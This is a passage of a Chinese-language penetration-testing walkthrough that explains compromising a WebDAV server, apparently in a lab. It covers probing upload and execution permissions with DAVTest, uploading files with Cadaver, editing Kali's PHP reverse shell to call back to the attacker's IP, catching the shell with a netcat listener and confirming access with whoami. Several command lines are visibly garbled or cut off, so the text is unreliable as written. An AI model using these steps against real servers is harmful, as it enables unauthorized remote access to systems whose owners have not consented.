二、使用DAVTest测试文件权限

我们要做的下一件事是测试服务器上的权限和文件执行策略。请记住，这里我们的最终目标是获得一个反向shell，因此我们需要知道我们要步入正轨。

DAVTest是一个方便的工具，可以自动为我们测试这些东西。只需在终端中键入davtest即可查看帮助和用法示例：

在最基本的级别上，我们要做的就是为它提供指向WebDAV实例的有效URL。自然，请使用-url开关，后跟正确的URL。

在这里，我们可以看到该工具的神奇之处。首先从测试连接开始，然后尝试创建测试目录，我们认为这是成功的。接下来，DAVTest将发送各种不同类型的文件，以确定可以上传的文件。看来所有这些都成功了。

在上面输出的末尾，我们看到了一些好东西：测试文件执行。我们可以看到它们大多数都失败了，但是TXT，HTML以及对我们来说最重要的PHP文件都将成功执行。我们现在需要做的就是找到一种上载Shell的方法。

三、使用Cadaver上载shell

在攻击的最后阶段，我们将使用一个名为Cadaver的工具，该工具提供了一个与WebDAV服务进行交互的直观界面—使用类似于FTP的简单易用的命令。

我们可以通过在终端中输入cadaver -h来查看帮助和使用信息：

在跳转到上载Shell之前，让我们使用无害的文本文件对其进行测试。首先，创建一个简单的文本文件：

root@drd:~# echo 'TESTING' > test.txt

接下来，我们可以通过提供适当的URL通过Cadaver连接到WebDAV：

~# cadaver:/dav/>

要获取可用命令的列表，请键入？或在提示时提供帮助：

我们可以使用put命令上传测试文件：

现在，如果我们在浏览器中导航到它，我们应该看到显示给我们的文本：

由于我们现在有信心可以进行上传，因此我们现在可以退出 Cadaver，以便准备好外壳程序：

dav:/dav/> to `10.10.0.50' closed.

Kali在/ usr / share / webshel??ls /目录中包含各种shell 。我们需要PHP反向shell，因此请使用以下命令将其复制到当前目录：

~# cp /usr/share//php/php-reverse-shell.php .

接下来，我们需要编辑一些内容，因此使用您喜欢的文本编辑器打开文件，并将IP地址更改为我们本地计算机的IP地址，并将端口更改为您选择的端口：

保存文件，并使用netcat设置侦听器以捕获传入的连接：

~# nc -lvnp on [any] 7777 ...

在新窗口或选项卡中，再次连接到WebDAV并上载我们的shell，就像我们之前对测试文件所做的一样：

现在浏览到该文件，如果成功，我们应该看到浏览器挂起：

回到我们的侦听器，我们应该看到目标打开了一个连接：

现在，我们可以发出诸如whoami之类的命令来确认我们已危害服务器：

sh-3.2$ -data